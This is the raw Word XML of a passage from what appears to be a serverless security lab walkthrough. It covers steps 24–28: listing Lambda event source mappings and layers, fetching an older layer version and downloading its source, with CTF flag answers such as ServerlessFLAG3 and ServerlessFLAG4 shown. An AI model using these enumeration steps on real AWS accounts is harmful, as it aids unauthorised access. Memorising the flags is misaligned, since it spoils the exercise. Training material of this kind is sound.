          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B8D10" w14:textId="4382DF1B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="13E18F55" w14:textId="77777777" w:rsidR="00767960" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The older version of function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>createUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> reveals ServerlessFLAG3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF634D" w14:textId="37821161" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009B30EC">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">ServerlessFLAG3: ​c7a8a952d4ccac49beb3a637e2d89b99 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF80B7" w14:textId="1129D2EE" w:rsidR="00767960" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009B30EC">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 24: ​The ServerlessFLAG4 is the ARN of event source. List the event source mappings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02B027" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00767960">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lambda list-event-source-mappings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4ABA6" w14:textId="77777777" w:rsidR="00767960" w:rsidRDefault="00767960" w:rsidP="0094232C"/>
    <w:p w14:paraId="252CC513" w14:textId="43989BD4" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00D55784" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="509EDB92" wp14:editId="435D3554">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>598680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>884553</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="915480" cy="3600"/>
                <wp:effectExtent l="63500" t="101600" r="62865" b="98425"/>
                <wp:wrapNone/>
                <wp:docPr id="260" name="Ink 260"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId101">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="915480" cy="3600"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3C2567D0" id="Ink 260" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:44.3pt;margin-top:64pt;width:77.8pt;height:11.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">
                <v:imagedata r:id="rId102" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D92A581" wp14:editId="559FD339">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>47880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>972393</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="132120" cy="13320"/>
                <wp:effectExtent l="63500" t="101600" r="71120" b="101600"/>
                <wp:wrapNone/>
                <wp:docPr id="259" name="Ink 259"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId103">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="132120" cy="13320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5DA1B291" id="Ink 259" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:.9pt;margin-top:70.9pt;width:16.05pt;height:12.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">
                <v:imagedata r:id="rId104" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56C9C1CF" wp14:editId="4A31722C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1510560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>834153</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4265640" cy="51480"/>
                <wp:effectExtent l="63500" t="101600" r="78105" b="100965"/>
                <wp:wrapNone/>
                <wp:docPr id="258" name="Ink 258"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId105">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4265640" cy="51480"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4C486821" id="Ink 258" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:116.1pt;margin-top:60.05pt;width:341.55pt;height:15.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">
                <v:imagedata r:id="rId106"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page20image66382608" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72BFB7CC" wp14:editId="4E2331C1">
            <wp:extent cx="5731510" cy="2536825"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="15875"/>
            <wp:docPr id="114" name="Picture 114" descr="page20image6638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ge20image6638260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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24BD20" w14:textId="77777777" w:rsidR="00F21352" w:rsidRDefault="00F21352" w:rsidP="0094232C"/>
    <w:p w14:paraId="7BB5AF24" w14:textId="55C3FF44" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F21352">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">ServerlessFLAG4: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CFE6E" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F21352">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">arn:aws:dynamodb:ap-southeast-1:276384657722:table/AllowedUser/stream/2020-11-05T22:14 :21.378 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F997050" w14:textId="70D3C628" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="00AD5F78" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 25: ​Check whether there are any layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C766F87" w14:textId="16343CB6" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D55784">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lambda list-layers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54947D32" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="00D55784" w:rsidP="0094232C"/>
    <w:p w14:paraId="36A15171" w14:textId="14542D1F" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00D55784" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C53B5EE" wp14:editId="6B076571">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>891000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>987563</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="838080" cy="23760"/>
                <wp:effectExtent l="88900" t="139700" r="102235" b="141605"/>
                <wp:wrapNone/>
                <wp:docPr id="261" name="Ink 261"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId108">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="838080" cy="23760"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="77DC7527" id="Ink 261" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:65.9pt;margin-top:69.25pt;width:74.5pt;height:18.8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">
                <v:imagedata r:id="rId109"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page21image66379072" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6C3E21" wp14:editId="76E65D25">
            <wp:extent cx="5731510" cy="2124075"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="9525"/>
            <wp:docPr id="111" name="Picture 111" descr="page21image6637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age21image6637907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24075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE3181" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>There is one layer named "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploaderLayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">" with 5 versions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44657DC2" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="00D55784" w:rsidP="0094232C"/>
    <w:p w14:paraId="4C7E151A" w14:textId="5F93CE7D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 26: ​Check each version of the layer "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploaderLayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>".</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">A specific version of layer can be extracted by mentioning the version number at the end of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65AB17" w14:textId="72617376" w:rsidR="00D55784" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">ARN. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D5C947" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1D4A23" w14:textId="00616E6C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">if the layer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>arn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> is "arn:aws:lambda:ap-southeast-1:276384657722:layer:FileUploaderLayer". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DAEAAF" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>Version 2 of the layer can be retrieved by adding ":2" at the end of Layer ARN.</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B1FADC" w14:textId="08976A6F" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Layer v2 ARN: ​arn:aws:lambda:ap-southeast-1:276384657722:layer:FileUploaderLayer:2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF16ABE" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D55784">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws lambda get-layer-version-by-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>arn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>arn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> arn:aws:lambda:ap-southeast-1:276384657722:layer:FileUploaderLayer:2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A98C3ED" w14:textId="36DBFEC3" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="31A15130" w14:textId="23C4FF26" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00D55784" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="577D2760" wp14:editId="077A2B9E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>426600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1334864</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4307400" cy="137880"/>
                <wp:effectExtent l="127000" t="215900" r="125095" b="217805"/>
                <wp:wrapNone/>
                <wp:docPr id="265" name="Ink 265"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId111">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4307400" cy="137880"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="30CB978B" id="Ink 265" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:26.55pt;margin-top:90.95pt;width:353.3pt;height:39.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">
                <v:imagedata r:id="rId112" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63BCA2FE" wp14:editId="0BA897E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>106200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>780464</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5546880" cy="424440"/>
                <wp:effectExtent l="127000" t="215900" r="142875" b="210820"/>
                <wp:wrapNone/>
                <wp:docPr id="264" name="Ink 264"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId113">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5546880" cy="424440"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="30B8D37F" id="Ink 264" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.25pt;margin-top:47.3pt;width:450.9pt;height:61.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">
                <v:imagedata r:id="rId114" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="484B16A7" wp14:editId="6C349A5E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>133200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1538264</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5578200" cy="255240"/>
                <wp:effectExtent l="127000" t="215900" r="124460" b="215265"/>
                <wp:wrapNone/>
                <wp:docPr id="263" name="Ink 263"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId115">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5578200" cy="255240"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="15137B46" id="Ink 263" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:3.45pt;margin-top:106.95pt;width:453.4pt;height:48.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">
                <v:imagedata r:id="rId116" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66A1E983" wp14:editId="2F3EEC9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>116280</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>538544</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5519520" cy="183960"/>
                <wp:effectExtent l="127000" t="215900" r="144780" b="210185"/>
                <wp:wrapNone/>
                <wp:docPr id="262" name="Ink 262"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId117">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5519520" cy="183960"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1085C937" id="Ink 262" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:2.05pt;margin-top:28.25pt;width:448.75pt;height:42.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">
                <v:imagedata r:id="rId118"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page22image66373248" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56AA6E8D" wp14:editId="1EBAD7CF">
            <wp:extent cx="5731510" cy="3141980"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="7620"/>
            <wp:docPr id="108" name="Picture 108" descr="page22image6637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age22image6637324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141980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B45C1B" w14:textId="74E7F5D5" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The Link to download the source code is present in the Location Attribute of Content section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CED761" w14:textId="77777777" w:rsidR="00D55784" w:rsidRPr="0094232C" w:rsidRDefault="00D55784" w:rsidP="0094232C"/>
    <w:p w14:paraId="01D32DEB" w14:textId="603AAA15" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 27: ​Download the source code of the layer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D953D1B" w14:textId="5D7EB034" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 28: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155F926" w14:textId="5FB96DD3" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00CE0C96" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
